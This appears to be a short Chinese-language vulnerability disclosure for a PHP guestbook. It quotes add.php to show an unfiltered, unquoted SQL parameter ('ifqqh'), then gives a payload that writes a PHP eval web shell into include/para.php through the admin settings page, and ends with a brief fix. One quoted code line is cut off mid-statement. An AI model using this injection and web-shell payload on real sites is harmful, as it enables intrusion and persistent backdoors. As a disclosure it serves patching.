下载地址：www.2cto.com/ym/201106/28037.html

add.php
<?php
                 if($_POST['unum']==$_SESSION["randValid"]){
                        $username=addslashes(htmlspecialchars($_POST['username']));
                        $email=addslashes(htmlspecialchars($_POST['email']));
                        $content=addslashes(htmlspecialchars($_POST['content']));
                        $userip=$_SERVER["REMOTE_ADDR"];
                        $ifqqh=$_POST["ifqqh"];
                        if(empty($ifqqh)) $ifqqh=0;
                        $systime=date("Y-m-d H:i:s");
                        if(!empty($content) or !empty($username)){
                        $ifshow="";                        //还原空格和回车
                        if(!empty($content)){
                                $content=str_replace("　","",$content);
                                $content=ereg_replace("\n","<br>　　",ereg_replace("
                        }
                        if($ifauditing==1){$ifshow=0;}else{$ifshow=1;}                        //还原结束
                        $sql="insert into ".TABLE_PREFIX."guestbook(username,email,content,userip,systime,ifshow,ifqqh)values('".$username."','".$email."','".$content."','".$userip."','".$systime."',".$ifshow.",".$ifqqh.")";
                        //echo $sql;

$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。

$sql="insert into ".TABLE_PREFIX."guestbook(username,email,content,userip,systime,ifshow,ifqqh)values('".$username."','".$email."','".$content."','".$userip."','".$systime."',".$ifshow.",".$ifqqh.")";$ifqqh没有用   '  来包含。不受magic_quotes_gpc影响

进入后台

admin_set.php
// write the para file
$filenum = fopen ("include/para.php","w");
ftruncate($filenum, 0);
fwrite($filenum, $parafile);
fclose($filenum);
echo "设置已保存，请稍候……<br><a href=".$pageUrl.">如果浏览器没有自动返回，请点击此处返回</a>";
echo "<meta http-equiv=\"refresh\" content=\"2; url=".$pageUrl."\">";
?>

可以写入include/para.php
写入44';eval($_POST[k]);即可

因为用了  '    包含
会受magic_quotes_gpc影响

修复：www.2cto.com方案：过滤$ifqqh=$_POST["ifqqh"];